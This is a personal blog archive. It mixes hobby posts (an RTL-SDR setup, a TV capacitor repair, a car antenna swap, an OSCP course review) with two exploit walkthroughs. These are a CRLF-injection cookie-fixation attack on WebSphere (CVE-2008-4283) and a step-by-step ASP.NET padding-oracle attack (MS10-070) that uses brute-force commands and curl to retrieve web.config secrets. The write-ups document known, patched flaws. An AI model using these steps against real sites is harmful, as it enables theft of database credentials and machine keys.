Sunday, November 4, 2012

RTLSDR in Virtualbox

To get rtlsdr working in Ubuntu 12.04 in virtualbox, just run the gnuradio build script and you can enable usb 2.0 (you'll need to install an extension pack).  It took it several minutes for the device to attach the first time (I was only using USB 1.1), so be patient (I thought it originally wasn't working).

While either USB 1.1 or USB 2.0 is chosen, the sample rate through virtualbox is still low enough that it's dropping packets at every sample rate I've tried, so I would not recommend it.  It does get enough valid data that you could probably work with it in many scenarios, so it's better than nothing, but I would not use rtlsdr in a VM if you can avoid it.

You will frequently need to disconnect and reconnect your rtlsdr since it seems to lock up every once in a while, just as it does on a physical machine, but it seems to happen more frequently.

Friday, November 2, 2012

GNURadio on Ubuntu 12.10 for RTLSDR

Very quick post.  I upgraded my Ubuntu laptop with gnuradio (built from script) from 12.04 and 12.10 and some of the dependencies seem broken.  I spent quite a while debugging it and rebuilt gnuradio from the script, but never resolved the issue.  I didn't try the gnuradio from apt, but I heard that was too old to support rtlsdr.  I couldn't find any discussions about this via google, so I thought I'd post this here in case someone was curious about upgrading.  I'm guessing this will be fixed at some point once smarted people run into this issue and fix it (in the build script?).

Update: I did a fresh install of 12.10 and reinstalled gnuradio from the build script and everything is working fine now.  My issue could be isolated, but my takeaway is to not upgrade ubuntu if you aren't willing to risk breaking your GNURadio install.

Saturday, May 5, 2012

Samsung TV Blown Capacitor - High Pitched Whine Sound

I had a Samsung TV that's known to have capacitor issues.  There is a capacitor settlement as a result of a class action lawsuit.  It was making a quiet but annoying high pitched whine sound.  This sound is normally from an inductor.

I couldn't find anything online about this, so that meant I was going to write this blog post when I fixed it to help others out.  I called the Samsung settlement line and they said this high pitched noise was not one of the symptoms of a blown capictor.

I took the back panel off and there was a popped capacitor, right next to an inductor, some transistors and a heat sink.  The capacitor is presumably used in an LC circuit before as part of a SMPS (switched mode power supply).  Initially, I tried hot gluing the inductor to quiet the oscillations down, because it didn't look too blown.  The sound changed in pitch, but remained.

The next day I replaced the capacitor and the sound went away.  I used my multimeter and the capacitor was measuring 0 farad.  I tested some known good ones, so I was using the multimeter it correctly.  I didn't have the right size capacitor handy, so I replaced the 2200uF 10v capacitor with a 220uF 50v capacitor.  It's not tuned to the right frequency (I think it's allowing the square root of 10 (3.16) higher frequencies than the initial design), but the sound went away entirely, so I'm happy.

I called the samsung line back and told them it was a blown cap and they said I'm still not eligible for anything because it wasn't exhibiting any of the known symptoms.  I dont know if it is worth pursuing, but it's annoying that there is a class action lawsuit to fix this issue, yet Samsung says I'm not covered.

The Fix
So in short, the fix (what you probably came here for) is to remove the back panel, look for a popped capacitor (the top will be lifted and there will be residue on it).  This capacitor will probably be in the position my screwdriver is pointing to, then replace the capacitor with one of the same size.  I only used a solder iron, solder, and a replacement capacitor.  You will probably want a 2200uF 10v (or greater) capacitor, which you can find thator something similar at RadioShack.

Let me know if you are having the same issue or if this helped.  Just curious how widespread this is.

Wednesday, July 20, 2011

SC430 Antenna Mast Removal & Replacement

Going with a non-security post here to provide some helpful information that can be somewhat hard to find.

Choosing an Antenna
First, you need to get a replacement antenna. I ordered one from the ebay seller "tt_motor", which was far from OEM quality (as claimed) and it did not fit. He quickly gave me a refund, and then I ordered an antenna from "laynlow1". This was also a fairly cheap chinese antenna. I heard these cheap antennas get quite a bit less reception than the OEM ones. After several months of use, it stopped extending all the way unless I was pulling on it as it went up. It made a grinding noise. Perhaps the wind bent this flimsy metal? I tried greasing it, but never had any luck.  I'm all about saving money, but in this case I couldn't find a good quality aftermarket replacement (please comment if you have). Next, I went with a OEM antenna from It was ~$60 shipped with my discount for being a clublexus member.  The unit was noticeably higher quality than the ones I've ordered off ebay.  It fixed my grinding noise, but I just installed it last night at the time of this writing.  Update: I sold this car in 2015 and the antenna still operated without issues.

Replacing the Antenna
This is a two-person job.
  • Remove the antenna retaining nut.  Be careful not to scratch it.
  • With the key in the ignition switch "LOCK" position, press the "AM" and "DISC" buttons on the radio simultaneously with turning the ignition switch to "ACC". Then the radio "LCD" display will read "ANT" and the antenna mast will hyper-extend, disengaging the cable. You can let go of the "AM" and "DISC" buttons now.
  • With the ignition switch still in "ACC", the new cable is inserted to a full stop into the motor antenna assembly through the mast pipe hole in the body panel, with the teeth on the antenna cable toward the rear of the vehicle. 
  • As the person in the driver's seat switches the key to "LOCK", feed the cable and mast pipe in. 
  • After it retracts completely, replace the retaining nut.

Wednesday, June 8, 2011

Exploiting CVE-2008-4283 - HTTP Response Spliting (CRLF Injection) in Websphere 5.1

I found this vuln a while back, but never successfully published the exploit after working with the vendor (IBM).  I say "succesfully", because I tried submitting it to securityfocus but it never got updated.

In short, this is how to exploit it.

By inserting %0A's onto the ibm_security_logout URL, a line feed character is injected into the 302 redirect URL, which allows you to insert custom headers.  Since it's in a 302, your options are pretty limited, but you can still set a cookie.

Here's a normal URL:

If the session cookie is not updated upon authentication, you can link this user and set their cookie to yours, and have them log you in.

This URL is an example exploit which sets a cookie:

Sunday, March 27, 2011

OSCP (Offensive Security Certified Professional) Course Review

I promised myself I would write summary of the OSCP class once I completed it, since there isn't much information about it.  It's not a very well known certification, but it's well respected by the people that are familiar with it.  There's quite a bit that is secret, such as the details of the exam, but I'll try to give you an idea of what to expect if you're considering taking the class.  I took it in the winter of 2009-2010, so some details may become outdated as time goes on and the class is revised.

Prerequisite Knowledge and Time Commitment
You can buy 30 or 60 days of class/lab time, and you can also buy 30-day extensions. It culminates in a 24 hour straight exam (you don’t have to use the whole 24 hours) which you can schedule whenever you want starting after 6am (Central Time) if I recall correctly. The test is fairly cheap to retake, so it's more of a time/pride thing to pass it on the first time than it is a matter of cost.  

I’m sure some people could pass the test without even taking the class, but there are also some people on the other end of the spectrum who start with no knowledge of Linux. I had some very basic experience with the topics covered, and I think I figured the time commitment was about 355 hours. I did the 60 day lab, then waited a bit, then extended it for another 30 days to finish the final challenges, then did some additional studying on my own. I started in October and took the test in April. 

The Course
The course material is something like 13 chapters (I think you can find the syllabus online) and it has a video and PDF that go through each. It goes through a lot of the basic security stuff (e.g. ARP spoofing, password cracking, etc.), but in the middle it hops into what I consider the main section, which is on exploitation through metasploit, as well as fuzzing and writing your own exploits. It gets into some intermediate exploit writing, but for the most part it’s simple stack-based buffer overflows. It gives you a good introduction into these topics, then kind of drops you into the deep end and gives you some IP's to root.  Some more training, examples of rooting boxes would have been nice here for someone who isn't a professional pentester.  Once you finish all the class material, there are a set of final challenges which are basically just some boxes to root. There are also quite a few additional boxes on the network that you can root. All that prepares you well for the test, but it doesn’t give you the answers.

The part about the class that I hated, was that if you asked almost any question, the answer would usually be this, “”. Even when I tried abstracting my question so it wasn’t related to the class, it was very tough to get an answer from anyone in #offsec. On one hand, it is good to not serve people the answers, but on the other hand when your'e completely stuck I don't think it's too much to ask whether you're headed in the right direction.  If I wanted to learn everything on my own without any guidance, I wouldn't have paid for the OSCP in the first place.  Having said that, overall it was an awesome class and I’d recommend it.  It’s so much fun to finally root a box that you've been attacking for the last 8 hours.  In short, it's probably one of the most frustrating yet satisfying experiences you'll come across.

· Do the class while it’s cold out. It was much easier to park myself in front of the computer on the nights and weekends during the winter.

· You don’t need to take that good of notes like it implies in the beginning, but you should keep track of exactly which boxes you have rooted. All they really care about is whether you pass the test (and your going the extra miles if it’s border line).

· If you want additional practice, set up a lab or enter one of the many online CTF’s. I found NetWars to be good practice, but it doesn’t look like they have rounds going anymore.

Thursday, October 21, 2010

Exploiting .NET Padding Oracle Attack MS10-070 (CVE-2010-3332) and Bypassing Microsoft's Workaround

This page has been (lightly) updated and moved to

This week I ran into my first ASP.NET site since MS10-070.  I had read Bryan Holyfield and Giorgio Fedon's posts, which were great posts with groundbreaking information, although it was still unclear as to how to actually exploit the vulnerability.  Tim Medin and I worked together to exploit this vulnerability.  He posted his experiences at Security Whole.

This is a very widespread and severe vulnerability.  If you have not applied the patch yet, apply it now.  One interesting thing to keep in mind about this vulnerability is that all Windows 2000 boxes will be permanently exposed to it, since their support is EoL’d.

Interacting with the tool and trying to interpret the correct steps through blogs was the most difficult part of exploiting this vulnerability. The blog posts were great, but at the same time were confusing.  I still have a few unanswered questions, but I'd like to share my experience to help out others attempting to exploit this vulnerability.  Without further ado, here are the steps to obtain the web.config for a site that has the original workaround ([padding] errors issue 302 redirects via CustomErrors).

Prep for the attack 
  • First, obtain a valid “d” value by observing a normal link to ScriptResource.axd (you can use ScriptResource.axd as the URL throughout this attack).
  • Before starting, it’d be a good idea to verify the site is vulnerable by using ms10-070CheckPatch. This does some slight decoding and takes the length modulus 8.  The patch adds more characters to the "d" value.  I'd check a few parameters if you want to be sure it's vulnerable (are multiples of 8 not possible with the patch?). 
  • If the ScriptResource.axd is authenticated, setup Burp Intruder to keep the cookies alive. 

The actual attack 
Bruteforce a valid T-Block to use as a prefix (using -bruteforce) and be sure to get the right block size and encoding method.  If you can't get a valid oracle, then try a different block size and encoding method.  If you do get a valid oracle, chose the option it suggests.
$ perl "" xxxxxxxxxxxxxxxx 16 -encoding 3 -bruteforce -log -verbose -cookies "ASP.NET_SessionId=f2471ac5-e515-..."
Once you have found a T-Block request, it'll say something like this, where the "d" value is your new T-block to use as prefix.
Attempt 15 - Status: 200 - Content Length: 393 TIM8UquygrlBs-oA68elaNxHtban...
Now we encrypt the plaintext using -prefix (from previous step) and -plaintext (using "|||~/web.config").

perl "" xxxxxxxxxxxxxxxx 16 -encoding 3 -plaintext "|||~/web.config" -noiv -prefix "DgAAAAAAAAAAAAAAAAAAAM8X6Hz6gTDN5E1DDdDehBXoKFWTIM8UquygrlBs-oA68elaNxHtban..." -cookies "ASP.NET_SessionId=f2471ac5-e515-..." 
** Finished *** 
[+] Encrypted value is: BXw6OSgQhp3YdMmkBqmuXQAAAAAAAAAAAAAAAAAAAAA1

Use the encypted value from the above step to replace your “d” (ciphertext) value. Bruteforce the correct T-block using -bruteforce (this took us 21,000 requests or several hours). When you get a valid t-block you can test this in your browser and hopefully the title will say some garbage and then your plaintext (“|||~/web.config”). The goal of this step is to brute force one of the magic values (as mentioned in Giorgio's blog) into the first two bytes (e.g. “r#”). The rest of the block doesn’t matter. Once you brute force the correct block you'll see a response with a much large response length (instead of ~360 which don't have the magic plaintext value).
Attempt 21906 - Status: 200 - Content Length: 12186
Now simply retrieve the gzip encoded web.config file using the URL.

$ curl "" —insecure -H "Cookie: ASP.NET_SessionId=f2471ac5-e515-..." > web.config.gz
 And unzip it using gunzip

gunzip -c web.config.gz > web.config
 Now open your web.config and you may have just compromised database passwords, the machine key, and other goodies.